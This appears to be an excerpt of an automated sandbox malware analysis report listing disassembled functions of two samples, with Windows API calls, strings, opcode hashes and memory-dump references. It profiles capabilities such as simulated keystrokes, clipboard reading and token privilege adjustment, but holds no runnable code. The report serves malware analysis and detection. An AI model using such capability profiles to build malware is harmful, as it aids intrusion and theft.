                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                          • Instruction ID: b52718d9992bdd50d7332cd031ec406bc7d8e9614cebeb5df0ac4ec60e17e4e9
                                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                          • Instruction Fuzzy Hash: 40116371500704ABC7219F78DE08B5BBFF8AF01711F048A7DE886E22A0D738DA48CB94
                                                          Function 0040604E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060B1
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060C0
                                                          • CharNextW.USER32(?,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060C5
                                                          • CharPrevW.USER32(?,?,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                          • Instruction ID: a09026506d824dbf9e13ec1e4905f02e05ac7e50fa84eba4f97cb212d859c974
                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                          • Instruction Fuzzy Hash: 6F11E71185062159DB30EB259C4097BB6F8EE99760752843FE9C6F32C0EB7C8CA1D2BD
                                                          Function 0040505D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 0040506D
                                                            • Part of subcall function 00403DC5: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DD7
                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050BB
                                                            • Part of subcall function 004062B9: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E8F,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062C6
                                                            • Part of subcall function 004062B9: wvsprintfW.USER32(00000000,?,?), ref: 004062DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                          • API String ID: 2266616436-4211696005
                                                          • Opcode ID: 99d14f7043e79d3d8086908b3cabd6d308359c9a829abfe0eea5bc0ae8c4af9b
                                                          • Instruction ID: 72b980f80c28ecfcd0407e0dace594f9e180666c0886337011194864861aae86
                                                          • Opcode Fuzzy Hash: 99d14f7043e79d3d8086908b3cabd6d308359c9a829abfe0eea5bc0ae8c4af9b
                                                          • Instruction Fuzzy Hash: D2F0D1368246009AE2106755BD06B6A77A4DF85711F68403FFF40B22E1DF7D18418AAD
                                                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,00403719,00000001,?,?,?,00000000,00403A5D,?), ref: 004032E5
                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A5D,?), ref: 0040332E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: ac63fb45ebae7e502b517329f215a40213becb05cb1b7459b7d9d9338ff04f82
                                                          • Instruction ID: 97d955eecb999c6cc4ecec0c264b20ab0036741e5c77e3c2fc1849182f84e521
                                                          • Opcode Fuzzy Hash: ac63fb45ebae7e502b517329f215a40213becb05cb1b7459b7d9d9338ff04f82
                                                          • Instruction Fuzzy Hash: 5BF05E30506620EBC2206FA4FE5CBAB7F68F704B82B41447EF541B12A4CB384951CBDC
                                                          Function 00405C55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007D5AB0,Error launching installer), ref: 00405C7A
                                                          • CloseHandle.KERNEL32(?), ref: 00405C87
                                                          Strings
                                                          • Error launching installer, xrefs: 00405C5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: c30e874c0dd13dafab9eec4149781a552473f0f0671de2e9495985384250c353
                                                          • Instruction ID: e53b0d2e07ed5cc42b65f46c088a0ffbd9ee82f7db84de32081c625a94508254
                                                          • Opcode Fuzzy Hash: c30e874c0dd13dafab9eec4149781a552473f0f0671de2e9495985384250c353
                                                          • Instruction Fuzzy Hash: C9E0ECB0900219ABEB009F64DE49D7B7FBCFB40305B408526A955E2250D778D8148AA8
                                                          Function 004062B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E8F,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062C6
                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062DD
                                                            • Part of subcall function 004060FD: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062EA,00000000), ref: 00406114
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                          • API String ID: 3509786178-2769509956
                                                          • Opcode ID: 7855ac2f6164c7a2629bb99e179585e0bc82677cf2e10cbf779388d075bdbb21
                                                          • Instruction ID: 2883f6fdbb75122e7c86ea7043297328e8e8306c32113c26ceb0f942655100f9
                                                          • Opcode Fuzzy Hash: 7855ac2f6164c7a2629bb99e179585e0bc82677cf2e10cbf779388d075bdbb21
                                                          • Instruction Fuzzy Hash: 1ED0523429460EAACA009BA0EE1DE1A3B79EF80304F84843EF046820B0EA389002CB0D
                                                          Function 00405DCC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00406BE9,?,00000000,00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405DDC
                                                          • lstrcmpiA.KERNEL32(00000000,00406BE9), ref: 00405DF4
                                                          • CharNextA.USER32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E05
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                          • Instruction ID: 154379d1c5420fb8949bca2a3232bbf94181924a40fc586370f8f53582277720
                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                          • Instruction Fuzzy Hash: 1AF06235105558EFC7019FA5DD0499F7BA8EF56350B2540AAE840E7311D634DE019FA9

                                                          Non-executed Functions

                                                          Function 0096D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0096D208
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000,?,?,?), ref: 0096D249
                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0,?,?,?), ref: 0096D28E
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0096D2B8
                                                          • SendMessageW.USER32 ref: 0096D2E1
                                                          • _wcsncpy.LIBCMT ref: 0096D359
                                                          • GetKeyState.USER32(00000011,?,?,?), ref: 0096D37A
                                                          • GetKeyState.USER32(00000009), ref: 0096D387
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0096D39D
                                                          • GetKeyState.USER32(00000010), ref: 0096D3A7
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000,?,?,?), ref: 0096D3D0
                                                          • SendMessageW.USER32 ref: 0096D3F7
                                                          • SendMessageW.USER32(?,00001030,?,0096B9BA,?,?,00000000,?,?,?,?,?,?), ref: 0096D4FD
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0096D513
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0096D526
                                                          • SetCapture.USER32(?), ref: 0096D52F
                                                          • ClientToScreen.USER32(?,?,?,?,00000001,@GUI_DRAGID), ref: 0096D594
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0096D5A1
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0096D5BB
                                                          • ReleaseCapture.USER32(?,?,?), ref: 0096D5C6
                                                          • GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 0096D600
                                                          • ScreenToClient.USER32(?,?), ref: 0096D60D
                                                          • SendMessageW.USER32(?,00001012,00000000,?,?), ref: 0096D669
                                                          • SendMessageW.USER32 ref: 0096D697
                                                          • SendMessageW.USER32(?,00001111,00000000,?,?), ref: 0096D6D4
                                                          • SendMessageW.USER32 ref: 0096D703
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0096D724
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0096D733
                                                          • GetCursorPos.USER32(?), ref: 0096D753
                                                          • ScreenToClient.USER32(?,?), ref: 0096D760
                                                          • GetParent.USER32(?,?), ref: 0096D780
                                                          • SendMessageW.USER32(?,00001012,00000000,?,?), ref: 0096D7E9
                                                          • SendMessageW.USER32 ref: 0096D81A
                                                          • ClientToScreen.USER32(?,?), ref: 0096D878
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0096D8A8
                                                          • SendMessageW.USER32(?,00001111,00000000,?,?), ref: 0096D8D2
                                                          • SendMessageW.USER32 ref: 0096D8F5
                                                          • ClientToScreen.USER32(?,?), ref: 0096D947
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0096D97B
                                                            • Part of subcall function 008E29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1AE0,?,?,?,?,?,?,008E1D8F,?,?,?), ref: 008E29BC
                                                          • GetWindowLongW.USER32(?,000000F0,?,?,?,?,?,?,?), ref: 0096DA17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 3977979337-4164748364
                                                          • Opcode ID: 5704a578e3afa41d4cf116ceca1bd4fd8f61bd53a345c851df15f422c081c117
                                                          • Instruction ID: f377abc8ecd545f0641401c0f9abe11a285362ea2ed8ed4e2b3e18b517d517cc
                                                          • Opcode Fuzzy Hash: 5704a578e3afa41d4cf116ceca1bd4fd8f61bd53a345c851df15f422c081c117
                                                          • Instruction Fuzzy Hash: B142AF30A093419FD724DF28CC58F6ABBE9FF8A714F140619F669872A0C771A854DB92
                                                          Function 008F5EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,?), ref: 008F5EE2
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000,?), ref: 009310D7
                                                          • IsIconic.USER32(?,?), ref: 009310E0
                                                          • ShowWindow.USER32(?,00000009), ref: 009310ED
                                                          • SetForegroundWindow.USER32(?), ref: 009310F7
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093110D
                                                          • GetCurrentThreadId.KERNEL32 ref: 00931114
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00931120
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00931131
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00931139
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00931141
                                                          • SetForegroundWindow.USER32(?), ref: 00931144
                                                          • MapVirtualKeyW.USER32(00000012,00000000,00000000,00000000), ref: 00931159
                                                          • keybd_event.USER32(00000012,00000000), ref: 00931164
                                                          • MapVirtualKeyW.USER32(00000012,00000000,00000002,00000000), ref: 0093116E
                                                          • keybd_event.USER32(00000012,00000000), ref: 00931173
                                                          • MapVirtualKeyW.USER32(00000012,00000000,00000000,00000000), ref: 0093117C
                                                          • keybd_event.USER32(00000012,00000000), ref: 00931181
                                                          • MapVirtualKeyW.USER32(00000012,00000000,00000002,00000000), ref: 0093118B
                                                          • keybd_event.USER32(00000012,00000000), ref: 00931190
                                                          • SetForegroundWindow.USER32(?), ref: 00931193
                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 009311BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: 623136e6985049664f7c66924e3fd0748197699e3670ee0bf462cf2c32f2e7b2
                                                          • Instruction ID: 03454e5720f0b1dde4e7aa2ab96cc14d228b4f3d73e482a762f3ff692a35c608
                                                          • Opcode Fuzzy Hash: 623136e6985049664f7c66924e3fd0748197699e3670ee0bf462cf2c32f2e7b2
                                                          • Instruction Fuzzy Hash: 68317A72A54318FFEB205BA19C49F7F7E6CEB84B50F104015FA04EA1D1C6B05D50BEA1
                                                          Function 00938F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00939399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009393E3
                                                            • Part of subcall function 00939399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00939410
                                                            • Part of subcall function 00939399: GetLastError.KERNEL32 ref: 0093941D
                                                          • _memset.LIBCMT ref: 00938F71
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00938FC3
                                                          • CloseHandle.KERNEL32(?), ref: 00938FD4
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000,?,?,?,00000001,?,?), ref: 00938FEB
                                                          • GetProcessWindowStation.USER32 ref: 00939004
                                                          • SetProcessWindowStation.USER32(00000000), ref: 0093900E
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00939028
                                                            • Part of subcall function 00938DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00938F27), ref: 00938DFE
                                                            • Part of subcall function 00938DE9: CloseHandle.KERNEL32(?,?,00938F27), ref: 00938E10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                          • String ID: $default$winsta0
                                                          • API String ID: 2063423040-1027155976
                                                          • Opcode ID: cc9f396d1a1d6dbc16b692b930a35b521eedc9d2c1312d52e51b67340e37599b
                                                          • Instruction ID: 740968250a1349cfc5673ea99835e97cc5ac00950c001f048123876738829879
                                                          • Opcode Fuzzy Hash: cc9f396d1a1d6dbc16b692b930a35b521eedc9d2c1312d52e51b67340e37599b
                                                          • Instruction Fuzzy Hash: 658147B290820ABFDF219FA4CC49BEEBB7DAF44304F044119F915B62A1D7718E55AF60
                                                          Function 00954632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00970980), ref: 0095465C
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0095466A
                                                          • GetClipboardData.USER32(0000000D), ref: 00954672
                                                          • CloseClipboard.USER32 ref: 0095467E
                                                          • GlobalLock.KERNEL32(00000000), ref: 0095469A
                                                          • CloseClipboard.USER32 ref: 009546A4
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 009546B9
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 009546C6
                                                          • GetClipboardData.USER32(00000001), ref: 009546CE
                                                          • GlobalLock.KERNEL32(00000000), ref: 009546DB
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0095470F
                                                          • CloseClipboard.USER32(00000001,00000000), ref: 0095481F
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: 8a2daefd586fdd262b20863ab61992a91e2338bf15971f0d45b310da6d5cafc2
                                                          • Instruction ID: 03d2ce175202e35b8b308f93cacadb514bab601ff0e724e35308025d12e03823
                                                          • Opcode Fuzzy Hash: 8a2daefd586fdd262b20863ab61992a91e2338bf15971f0d45b310da6d5cafc2
                                                          • Instruction Fuzzy Hash: 4D519032258205ABD700EF75DC99F6E77A8FFC4B05F000529FA59D21A2DF70D9889B62
                                                          Function 0094CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0094CDD0
                                                          • FindClose.KERNEL32(00000000), ref: 0094CE24
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0094CE49
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0094CE60
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0094CE87
                                                          • __swprintf.LIBCMT ref: 0094CED3
                                                          • __swprintf.LIBCMT ref: 0094CF16
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          • __swprintf.LIBCMT ref: 0094CF6A
                                                            • Part of subcall function 009038C8: __woutput_l.LIBCMT ref: 00903921
                                                          • __swprintf.LIBCMT ref: 0094CFB8
                                                            • Part of subcall function 009038C8: __flsbuf.LIBCMT ref: 00903943
                                                            • Part of subcall function 009038C8: __flsbuf.LIBCMT ref: 0090395B
                                                          • __swprintf.LIBCMT ref: 0094D007
                                                          • __swprintf.LIBCMT ref: 0094D056
                                                          • __swprintf.LIBCMT ref: 0094D0A5
                                                          Strings
                                                          Memory Dump Source
